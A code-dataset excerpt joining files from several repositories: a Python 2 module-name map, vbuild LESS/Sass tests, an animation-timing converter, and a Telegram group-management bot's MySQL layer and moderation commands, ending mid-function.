'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
'HTTPHandler', 'HTTPPasswordMgr',
'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
'build_opener', 'install_opener', 'parse_http_list',
'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
'urllib' : (
'ContentTooShortError', 'FancyURLopener', 'URLopener',
'basejoin', 'ftperrors', 'getproxies',
'getproxies_environment', 'localhost', 'pathname2url',
'quote', 'quote_plus', 'splitattr', 'splithost',
'splitnport', 'splitpasswd', 'splitport', 'splitquery',
'splittag', 'splittype', 'splituser', 'splitvalue',
'thishost', 'unquote', 'unquote_plus', 'unwrap',
'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
'urlretrieve',),
'urlparse' : (
'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
'dbm' : (
'ndbm', 'gnu', 'dumb'),
'anydbm' : (
'error', 'open'),
'whichdb' : (
'whichdb',),
'BaseHTTPServer' : (
'BaseHTTPRequestHandler', 'HTTPServer'),
'CGIHTTPServer' : (
'CGIHTTPRequestHandler',),
'SimpleHTTPServer' : (
'SimpleHTTPRequestHandler',),
'DocXMLRPCServer' : (
'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
'DocXMLRPCServer', 'ServerHTMLDoc', 'XMLRPCDocGenerator'),
}
if __name__ == '__main__':
# Awesome for testing
code = """
"""
t = LegacyPythonTranslator(code)
new_code = t.translate()
print(t.tokens)
print('---')
print(new_code)
```
|
{
"source": "JesusZerpa/vbuild",
"score": 2
}
|
#### File: vbuild/tests/test_vbuild_less.py
```python
import vbuild
import pytest
import sys
@pytest.mark.skipif(not vbuild.hasLess, reason="requires lesscpy")
def test_less():
h = """<template><div>XXX</div></template>
<Style scoped Lang = "leSS" >
body {
border-width: 2px *3;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
assert "6px" in r.style
h = """<template><div>XXX</div></template>
<Style scoped lang="less">
body {
font: @unknown;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
with pytest.raises(
vbuild.VBuildException
): # vbuild.VBuildException: Component 'comp.vue' got a CSS-PreProcessor trouble : Error evaluating expression:
r.style
```
#### File: vbuild/tests/test_vbuild_sass.py
```python
import vbuild
import pytest
import sys
@pytest.mark.skipif(not vbuild.hasSass, reason="requires pyScss")
def test_sass():
h = """<template><div>XXX</div></template>
<Style scoped lang="sass">
body {
font: 2px *3;
color: red + green;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
assert "6px" in r.style
assert "#ff8000" in r.style
h = """<template><div>XXX</div></template>
<Style scoped lang="sass">
body {
font: $unknown;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
with pytest.raises(
vbuild.VBuildException
): # vbuild.VBuildException: Component 'comp.vue' got a CSS-PreProcessor trouble : Error evaluating expression:
r.style
# ensure inline def class are OK
h = """<template><div>XXX</div></template>
<Style scoped lang="sass">
:scope {
color:blue;
div {color:red}
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
assert (
r.style == """*[data-comp] {color: blue; }\n*[data-comp] div {color: red; }"""
)
```
|
{
"source": "Jesuszilla/ConvertTurbo",
"score": 3
}
|
#### File: ConvertTurbo/ConvertTurbo/ConvertTurbo.py
```python
import io
import os
import re
import sys
'''
Modify this parameter to skip 1 in x frames. In the default,
4, this would skip 1 frame every 4 frames.
So, [5,3,4,3,4,4,1] would become [4,2,3,3,3,3,0].
'''
SKIP_FRAME = 4
'''
Modify this parameter to modify the range of animations which
will be converted to turbo. The first argument is the start
animation, and the second is the end animation
'''
ANIM_RANGE = range(200,3999)
'''
Modify this parameter to specify a list of ranges to ignore.
For example, to ignore animations in [0,42] and [700,799]:
IGNORE_RANGES = [range(0,42), range(700,799)]
'''
IGNORE_RANGES = [range(700,726)]
##################################################
# DO NOT MODIFY ANYTHING BELOW #
##################################################
ANIM_BEGIN_REGEX = re.compile(r"\[\s*begin\s+action\s+\d+\s*\]", re.IGNORECASE)
ANIM_NUMBER_REGEX = re.compile(r"\d+")
NUMBER_START_REGEX = re.compile(r"\s*\d+")
BASE = "{0},{1}, {2},{3}, {4}\n"
BASEOPT = "{0},{1}, {2},{3}, {4}, {5}\n"
BASEOPT2 = "{0},{1}, {2},{3}, {4}, {5}, {6}\n"
BASEOPT2 = "{0},{1}, {2},{3}, {4}, {5}, {6}, {7}\n"
# Test cases
#input = [5,3,4,3,4,4,1]
#expected = [4,2,3,3,3,3,0]
#input = [4,3,4,3,4,4,1]
#expected = [3,3,3,2,3,3,1]
#input = [4,4,4,4,4,4,4]
#expected = [3,3,3,3,3,3,3]
#input = [5,4,5,4,5,4,5]
#expected = [4,3,4,3,4,3,3]
#input = [1,1,1,1,1,1,1]
#expected = [1,1,1,0,1,1,1]
def main():
if len(sys.argv) != 3:
sys.exit("Usage: ConvertTurbo.py input_file output_file")
input,output = sys.argv[1:]
with open(input,'r') as f:
with open(output,'w') as o:
currTime = 0
ignoreAnim = False
for line in f:
# Start of an animation
if ANIM_BEGIN_REGEX.match(line):
currTime = 0
anim = int(ANIM_NUMBER_REGEX.findall(line)[0])
# Should we ignore the animation?
if anim in ANIM_RANGE:
for r in IGNORE_RANGES:
ignoreAnim = anim in r
if ignoreAnim:
break
else:
ignoreAnim = True
o.write(line)
# Start of an animation element
elif NUMBER_START_REGEX.match(line) and not ignoreAnim:
data = line.split(",")
t = int(data[4])
# Only do this for positive, non-zero timings
if t > 0:
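# Worked example with SKIP_FRAME = 4: starting at currTime = 0, a timing of
# t = 5 gives framesToSkip = int(5/4) = 1, so tNew = 4 and currTime = 5 % 4 = 1;
# the next timing t = 3 then gives framesToSkip = int((1+3)/4) = 1 and tNew = 2,
# matching the first test case above ([5,3,...] -> [4,2,...]).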
tNew = t
framesToSkip = int((currTime+t) / SKIP_FRAME)
tNew -= framesToSkip
currTime = (currTime+t)%(SKIP_FRAME)
data[4] = " " + str(tNew)
if not data[len(data)-1].endswith("\n"):
data[len(data)-1] = data[len(data)-1] + "\n"
o.write(",".join(data))
else:
o.write(line)
if __name__ == "__main__":
main()
```
|
{
"source": "jesvijonathan/Jesvi-Bot-Telegram",
"score": 2
}
|
#### File: modules/core/database.py
```python
from os import system, truncate
from re import L
from time import sleep
from config import *
from mysql import connector
def load():
db = connector.connect(
host=database_host,
user=database_user,
password=database_password,
database=database_name)
cursor = db.cursor(buffered=True)
bot_db(cursor,db)
class create_db:
# Variable Initialisation
def __init__(self):
self.db = connector.connect(
host=database_host,
user=database_user,
password=<PASSWORD>,
database=database_name)
self.cursor = self.db.cursor(buffered=True)
self.user = self.chat = None
# Table Creation
def chat_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS chat_base ( chat_id VARCHAR(14) PRIMARY KEY, type VARCHAR(14), title VARCHAR(48), username VARCHAR(48), join_date TIMESTAMP)"
) # chat_base : chat_id | type | title | username | join_date
self.cursor.execute(sql)
self.db.commit()
def user_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS user_base ( user_id VARCHAR(14) PRIMARY KEY, first_name VARCHAR(48), last_name VARCHAR(48), username VARCHAR(48), is_bot BOOLEAN, date TIMESTAMP)"
) # user_base : user_id | first_name | lastname | username | is_bot | date
self.cursor.execute(sql)
self.db.commit()
def settings_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS settings_base ( chat_id VARCHAR(14) PRIMARY KEY, members TINYINT, warn_limit TINYINT DEFAULT 3, strike_action TINYINT DEFAULT 0, disabled_commands TINYINT DEFAULT 0, filter TINYINT DEFAULT 1, notes TINYINT DEFAULT 1, chat_lock TINYINT DEFAULT 0, recent_pin TINYINT)"
) # settings_base : chat_id | members | warn_limit | strike_action | disabled_commands | filter | notes | lock | recent_pin
self.cursor.execute(sql)
self.db.commit()
def filter_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS filter_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), filter_word VARCHAR(32), filter_type TINYINT DEFAULT 0, response TEXT NULL, remove BOOLEAN DEFAULT 0)"
) # filter_base : id | chat_id | filter_word | filter_type | response | remove
self.cursor.execute(sql)
self.db.commit()
def notes_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS notes_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), note_name VARCHAR(32), note_text TEXT, set_by VARCHAR(32), date TIMESTAMP)"
) # notes_base : id | chat_id | note_name | note_text | set_by | date
self.cursor.execute(sql)
self.db.commit()
def warn_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS warn_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), user_id VARCHAR(14), by_user_id VARCHAR(14), message_id VARCHAR(14), reason TEXT, date TIMESTAMP)"
) # warn_base : id | chat_id | user_id | by_user_id | message_id | reason | date
self.cursor.execute(sql)
self.db.commit()
def link_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS link_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), user_id VARCHAR(14), status VARCHAR(14) DEFAULT 'member', bio TEXT, join_date TIMESTAMP, last_active TIMESTAMP)"
) # link_base : id | chat_id | user_id | status | bio | join_date | last_active
self.cursor.execute(sql)
self.db.commit()
def disabled_commands_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS disabled_commands_base ( id VARCHAR(14) PRIMARY KEY, chat_id VARCHAR(14), user_id VARCHAR(14), command VARCHAR(32), set_by VARCHAR(14))"
) # disabled_commands_base : id | chat_id | user_id | command | set_by
self.cursor.execute(sql)
self.db.commit()
def recent_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS recent_base ( id VARCHAR(14) PRIMARY KEY, chat_id VARCHAR(14), pin_text TEXT, message_id VARCHAR(14), pin_by VARCHAR(32), date TIMESTAMP)"
) # recent_base : id | chat_id | pin_text | message_id | pin_by | date
self.cursor.execute(sql)
self.db.commit()
def rule_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS rule_base ( chat_id VARCHAR(14) PRIMARY KEY, rule_text TEXT, rule_type VARCHAR(14), redirect BOOLEAN DEFAULT 0)"
) # rules_base : chat_id | rule_text | rule_type | redirect
self.cursor.execute(sql)
self.db.commit()
def welcome_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS welcome_base ( chat_id VARCHAR(14) PRIMARY KEY, welcome_text TEXT, verification BOOLEAN DEFAULT 0, fail_action TINYINT DEFAULT 1)"
) # welcome_base : chat_id | welcome_text | verification | fail_action
self.cursor.execute(sql)
self.db.commit()
def create_base(self):
self.chat_base()
self.user_base()
self.link_base()
self.settings_base()
self.filter_base()
self.notes_base()
self.warn_base()
self.rule_base()
self.welcome_base()
try:
class bot_db:
# Variable Initialisation
def __init__(self):
self.db = connector.connect(
host=database_host,
user=database_user,
password=<PASSWORD>,
database=database_name)
self.cursor = self.db.cursor(buffered=True)
self.user = self.chat = None
def parse(self,chat,user):
self.add_user(user)
self.add_chat(chat)
self.add_link(chat, user)
def add_user(self,user):
username = user['username']
first_name = user['first_name']
last_name = user['last_name']
sql = (
"INSERT INTO user_base (user_id, username, first_name, last_name, is_bot, date) VALUE(%s, %s, %s, %s, %s, CURRENT_TIMESTAMP()) ON DUPLICATE KEY UPDATE username=%s, first_name=%s, last_name=%s")
data = (
user['id'],
username, first_name, last_name,
user['is_bot'],
username, first_name, last_name,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_user(self,user_id):
sql = (
"SELECT * FROM user_base WHERE user_id=%s"
)
data = (
user_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_chat(self,chat):
title = chat['title']
username = chat['username']
sql = (
"INSERT INTO chat_base (chat_id, type, title, username, join_date) VALUE(%s, %s, %s, %s, CURRENT_TIMESTAMP()) ON DUPLICATE KEY UPDATE title=%s, username=%s")
data = (
chat['id'], chat['type'],
title, username,
title, username
)
# print(data)
self.cursor.execute(sql, data)
self.db.commit()
def get_chat(self,chat_id=None):
if chat_id == None:
sql = (
"SELECT * FROM chat_base"
)
self.cursor.execute(sql,)
return self.cursor.fetchall()
else:
sql = (
"SELECT * FROM chat_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def update_link(self, chat, user, meth=0):
"""
if meth == 1:
sql = (
"UPDATE link_base SET status='member WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
bio, chat_id, user_id
)
self.cursor.execute(sql, data1)
self.db.commit()
"""
pass
def add_link(self,chat, user, status="member", replace=0, bio=None):
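# replace modes: 0 -> refresh last_active only, 1 -> update status and
# last_active, 3 -> update status only, 5 -> update bio only; when no
# (chat_id, user_id) row exists yet, a new link row is inserted instead.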
chat_id = chat['id']
user_id = user['id']
sql = (
"SELECT (1) FROM link_base WHERE chat_id=%s AND user_id=%s LIMIT 1"
)
data = (
chat_id,
user_id
)
self.cursor.execute(sql, data)
if self.cursor.fetchone():
if replace == 1:
sql1 = (
"UPDATE link_base SET status=%s, last_active=CURRENT_TIMESTAMP() WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
status, chat_id, user_id
)
elif replace == 3:
sql1 = (
"UPDATE link_base SET status=%s WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
status, chat_id, user_id
)
elif replace == 5:
sql1 = (
"UPDATE link_base SET bio=%s WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
bio, chat_id, user_id
)
else:
sql1 = (
"UPDATE link_base SET last_active=CURRENT_TIMESTAMP() WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
chat_id, user_id
)
else:
sql1 = (
"INSERT INTO link_base (chat_id, user_id, status, join_date, last_active) VALUE(%s, %s, %s, CURRENT_TIMESTAMP(), CURRENT_TIMESTAMP())"
)
data1 = (
chat_id, user_id, status,
)
self.cursor.execute(sql1, data1)
self.db.commit()
def get_link(self,chat_id, user_id=None, comp = 0):
if comp == 1:
sql = (
"SELECT * FROM link_base WHERE chat_id=%s AND status=%s"
)
status = "administrator"
data = (
chat_id, status,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
elif user_id == None:
sql = (
"SELECT * FROM link_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
else:
sql = (
"SELECT * FROM link_base WHERE chat_id=%s AND user_id=%s"
)
data = (
chat_id, user_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_settings(self, chat_id, members=None,lock=None,filter=None,notes=None):
if lock != None:
sql = (
"INSERT INTO settings_base (chat_id, chat_lock) VALUE(%s, %s) ON DUPLICATE KEY UPDATE chat_lock=%s"
)
data = (
chat_id, lock,
lock,
)
elif filter != None:
sql = (
"INSERT INTO settings_base (chat_id, filter) VALUE(%s, %s) ON DUPLICATE KEY UPDATE filter=%s"
)
data = (
chat_id, filter,
filter,
)
elif notes != None:
sql = (
"INSERT INTO settings_base (chat_id, notes) VALUE(%s, %s) ON DUPLICATE KEY UPDATE notes=%s"
)
data = (
chat_id, notes,
notes,
)
elif members != None:
sql = (
"INSERT INTO settings_base (chat_id, members) VALUE(%s, %s) ON DUPLICATE KEY UPDATE members=%s"
)
data = (
chat_id, members,
members,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_settings(self,chat_id):
sql = (
"SELECT * FROM settings_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_note(self, chat_id, note_name, note_text, set_by):
sql = (
"REPLACE INTO notes_base (chat_id, note_name, note_text, set_by, date) VALUE(%s, %s, %s, %s, CURRENT_TIMESTAMP())"
)
data = (
chat_id, note_name, note_text, set_by,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_note(self,chat_id):
sql = (
"SELECT * FROM notes_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
def get_note_text(self,chat_id,note_name=None):
sql = (
"SELECT * FROM notes_base WHERE chat_id=%s AND note_name=%s LIMIT 1"
)
data = (
chat_id,note_name,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def remove_note(self,chat_id,note_name=None):
if note_name == '*':
sql = (
"DELETE FROM notes_base WHERE chat_id=%s"
)
data = (
chat_id,
)
else:
sql = (
"DELETE FROM notes_base WHERE chat_id=%s AND note_name=%s ORDER BY id DESC LIMIT 1"
)
data = (
chat_id,note_name,
)
self.cursor.execute(sql, data)
self.db.commit()
def add_filter(self,chat_id, word, type=0, response=None, delete=1):
sql = (
"REPLACE INTO filter_base (chat_id, filter_word, filter_type, response, remove) VALUE(%s, %s, %s, %s, %s)"
)
data = (
chat_id, word, type, response, delete,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_filter(self,chat_id):
sql = (
"SELECT * FROM filter_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
def remove_filter(self,chat_id,word):
if word == '*':
sql = (
"DELETE FROM filter_base WHERE chat_id=%s"
)
data = (
chat_id,
)
else:
sql = (
"DELETE FROM filter_base WHERE chat_id=%s AND filter_word=%s ORDER BY id DESC LIMIT 1"
)
data = (
chat_id, word,
)
self.cursor.execute(sql, data)
self.db.commit()
def add_rule(self,chat_id, rule_type, redirect, rule_text):
# rules_base : chat_id | rule_text | rule_type | redirect | set_by | date
sql = (
"REPLACE INTO rule_base (chat_id, rule_text, rule_type, redirect) VALUE(%s, %s, %s, %s)"
)
data = (
chat_id, rule_text, rule_type, redirect,
)
self.cursor.execute(sql, data)
self.db.commit()
def del_rule(self,chat_id):
# rules_base : chat_id | rule_text | rule_type | redirect | set_by | date
sql = (
"DELETE FROM rule_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_rule(self,chat_id):
sql = (
"SELECT * FROM rule_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_warn(self, chat_id, user_id, by_user_id, message_id, reason):
sql = (
"INSERT INTO warn_base (chat_id, user_id, by_user_id, message_id, reason, date) VALUE(%s, %s, %s, %s, %s, CURRENT_TIMESTAMP())"
)
data = (
chat_id, user_id, by_user_id, message_id, reason,
) # warn_base : id | chat_id | user_id | by_user_id | message_id | reason | date
self.cursor.execute(sql, data)
self.db.commit()
def get_warn(self, chat_id=None, user_id=None, list=0):
if list ==1:
sql = (
"SELECT * FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id"
)
data = (
chat_id, user_id,
)
elif chat_id == None:
sql = (
"SELECT *, COUNT(*) FROM warn_base WHERE user_id=%s ORDER BY id"
)
data = (
user_id,
)
elif user_id == None:
sql = (
"SELECT *, COUNT(*) FROM warn_base WHERE chat_id=%s ORDER BY id"
)
data = (
chat_id,
)
else:
sql = (
"SELECT *, COUNT(*) FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id"
)
data = (
chat_id, user_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
def remove_warn(self, chat_id, user_id, lr=0):
if user_id == None:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s"
)
data = (
chat_id,
)
else:
if lr == 0:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id DESC LIMIT 1"
)
elif lr == 1:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id ASC LIMIT 1"
)
elif lr == 2:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s AND user_id=%s"
)
data = (
chat_id, user_id,
)
self.cursor.execute(sql, data)
self.db.commit()
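# NOTE: this get_welcome reads warn_base and is shadowed by the later
# get_welcome below, which reads welcome_base.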
def get_welcome(self,chat_id,user_id=None):
if user_id != None:
sql = (
"SELECT * FROM warn_base WHERE chat_id=%s AND user_id=%s"
)
data = (
chat_id, user_id,
)
else:
sql = (
"SELECT * FROM warn_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_welcome(self,chat_id, welcome_text="Hello {first_name}, \nWelcome to {group_name} !"):
sql = (
"REPLACE INTO welcome_base (chat_id, welcome_text) VALUE(%s, %s)"
)
data = (
chat_id, welcome_text
)
# print(data)
self.cursor.execute(sql, data)
self.db.commit()
def get_welcome(self,chat_id):
sql = (
"SELECT * FROM welcome_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
except Exception as ex:
print(ex)
load()
```
|
{
"source": "jesvijonathan/Jesvi-Bot",
"score": 2
}
|
#### File: modules/core/ban.py
```python
import modules.core.extract as extract
import modules.core.database as database
import telegram
import threading
try:
from config1 import *
except:
from config import *
import time
class ban_cls():
def __init__(self,update,context) -> None:
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.tag_user_id = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.tag_user_id = self.tag_user["id"]
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.chat_id = self.chat["id"]
self.user_id = self.user["id"]
self.msg_string = self.msg.text
def ban(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,context=self.context)
if n == 2:
self.msg.reply_text("Nope !")
return
elif n == 1:
self.msg.reply_text("Get another admin to do it !")
return
self.update.effective_chat.kick_member(self.tag_user_id)
self.update.message.reply_text("Banned " + self.tag_user["first_name"] + " !")
def unban(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
chat = self.update.effective_chat
chat.unban_member(self.tag_user_id)
self.update.message.reply_text("Un-banned " + self.tag_user["first_name"] + " !")
def kick(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,context=self.context)
if n == 2:
self.msg.reply_text("Nope !")
return
elif n == 1:
self.msg.reply_text("Get another admin to do it !")
return
self.update.effective_chat.unban_member(self.tag_user_id)
self.update.message.reply_text("Kicked " + self.tag_user["first_name"] + " !")
def leave(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,sudo=1,context=self.context)
if m != 2 and m != 7:
if m==1:
self.msg.reply_text("'Owner only' command !")
return
msgg = self.msg.reply_text("Clearing group db befre leaving...")
time.sleep(5)
msgg.edit_text("You can add me back any time.\n Bye !")
self.update.effective_chat.unban_member(bot_id)
def rip(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=0,context=self.context)
if m == 2 or m == 1:
self.msg.reply_text("Hmm")
return
txt = self.msg.reply_text("You asked for it, any last words ?")
time.sleep(5)
self.update.effective_chat.unban_member(self.user_id)
txt.edit_text(str(self.user["first_name"]) + " got voluntarily kicked !")
def unmute(self):
if self.tag_user_id == None:
user_id = self.user_id
else:
user_id = self.tag_user_id
#current = eval(str(context.bot.getChat(chat_id).permissions))
new = {'can_send_messages': True,
'can_send_media_messages': True,
'can_send_polls': True,
'can_send_other_messages': True,
'can_add_web_page_previews': True,
'can_invite_users': True,
'can_change_info': True,
'can_pin_messages': True}
permissions = {'can_send_messages': None,
'can_send_media_messages': None,
'can_send_polls': None,
'can_send_other_messages': None,
'can_add_web_page_previews': None,
'can_invite_users': None,
'can_change_info': None,
'can_pin_messages': None}
# permissions.update(current)
permissions.update(new)
new_permissions = telegram.ChatPermissions(**permissions)
self.context.bot.restrict_chat_member(
self.chat_id, user_id, permissions=new_permissions)
def mute(self):
if self.tag_user_id == None:
user_id = self.user_id
else:
user_id = self.tag_user_id
#current = eval(str(context.bot.getChat(chat_id).permissions))
new = {'can_send_messages': False,
'can_send_media_messages': False,
'can_send_polls': False,
'can_send_other_messages': False,
'can_add_web_page_previews': False,
'can_invite_users': False,
'can_change_info': False,
'can_pin_messages': False}
permissions = {'can_send_messages': None,
'can_send_media_messages': None,
'can_send_polls': None,
'can_send_other_messages': None,
'can_add_web_page_previews': None,
'can_invite_users': None,
'can_change_info': None,
'can_pin_messages': None}
# permissions.update(current)
permissions.update(new)
new_permissions = telegram.ChatPermissions(**permissions)
self.context.bot.restrict_chat_member(
self.chat_id, user_id, permissions=new_permissions)
def router(self):
res = self.msg_string.split(None,1)
if res[0] == "/ban":
self.ban()
elif res[0] == "/unban":
self.unban()
elif res[0] == "/kick":
self.kick()
elif res[0] == "/leave":
self.leave()
elif res[0] == "/rip":
self.rip()
elif res[0] == "/mute":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.mute()
elif res[0] == "/unmute":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.unmute()
def thread_ban(update, context):
threading.Thread(target=ban_cls(update,context).router, args=(), daemon=True).start()
```
#### File: modules/core/edit.py
```python
import modules.core.extract as extract
import modules.core.database as database
import threading
try:
from config1 import *
except:
from config import *
import time
class edit_cls():
def __init__(self,update,context) -> None:
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.tag_user_id = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.tag_user_id = self.tag_user["id"]
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.chat_id = self.chat["id"]
self.user_id = self.user["id"]
self.msg_string = self.msg.text
def pin(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
self.context.bot.pinChatMessage(self.chat_id, self.tag_msg.message_id)
def unpin(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
try:
self.context.bot.unpinChatMessage(self.chat_id)
except:
pass
def promote(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,del_lvl=0,context=self.context)
if n == 2:
self.msg.reply_text(
"'I can't give where I got my powers from' ~@jesvi_bot")
return
elif n == 1:
self.msg.reply_text("Already a fellow admin !")
return
self.context.bot.promoteChatMember(int(self.chat_id), int(self.tag_user_id),
can_change_info=True,
can_delete_messages=True,
can_invite_users=True,
can_restrict_members=True,
can_pin_messages=True,
can_promote_members=False)
self.msg.reply_text("Promoted " + self.tag_user["first_name"] + " !")
def depromote(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
elif m == 2:
pass
else:
n = extract.sudo_check_2(msg=self.tag_msg,del_lvl=0,context=self.context)
if n == 2:
self.msg.reply_text(
"Wha- !")
return
elif n == 1:
self.msg.reply_text("Admins have to demote other admins manually..")
return
self.context.bot.promoteChatMember(int(self.chat_id), int(self.tag_user_id),
can_change_info=False,
can_delete_messages=False,
can_invite_users=False,
can_restrict_members=False,
can_pin_messages=False,
can_promote_members=False)
self.msg.reply_text("Depromoted " + str(self.tag_user["first_name"]) + " !")
def router(self):
res = self.msg_string.split(None,1)
if res[0] == "/promote":
self.promote()
elif res[0] == "/demote":
self.depromote()
elif res[0] == "/pin":
self.pin()
elif res[0] == "/unpin":
self.unpin()
elif res[0] == "/titleset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
text = "Error"
try:
self.context.bot.set_chat_title(chat_id=self.chat_id, title=res[1])
text = "Chat name changed to '" + res[1] + "' !"
except Exception as x:
text = str(x)
self.msg.reply_text(text)
elif res[0] == "/descset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
text= "Error !"
try:
if self.tag_msg == None:
try:
self.context.bot.set_chat_description(self.chat_id, str(res[1]))
text = 'Chat description updated !'
except:pass
else:
try:
self.context.bot.set_chat_description(self.chat_id, self.tag_msg.text)
text = 'Chat description updated !'
except:pass
self.context.bot.send_message(
self.chat_id, text=text)
except:
pass
elif res[0] == "/nickset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
text = "Error"
try:
self.update.effective_chat.set_administrator_custom_title(
user_id=self.tag_user_id, custom_title=res[1])
try:
user_name = "for @" + self.tag_user.username
except:
user_name = ""
text = '"' + res[1]+'" set as the custom title ' + user_name
except Exception as x:
text = str(x)
self.msg.reply_text(text)
elif res[0] == "/bioset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,del_lvl=0,context=self.context)
if n == 2 and m == 1:
self.msg.reply_text("Admins can't set the group owner's bio")
return
try:
bio = res[1]
except:
self.msg.reply_text("Provide details about the tagged user's role in the group")
return
self.db.add_link(self.chat,self.tag_user,status=None,replace=5,bio=bio)
self.msg.reply_text(self.tag_user["first_name"] +" 's group-bio updated !")
elif res[0] == "/biodel":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.db.add_link(self.chat,self.tag_user,status=None,replace=5,bio=None)
self.msg.reply_text( self.tag_user["first_name"] + " 's group-bio deleted !")
elif res[0] == "/bio":
try:
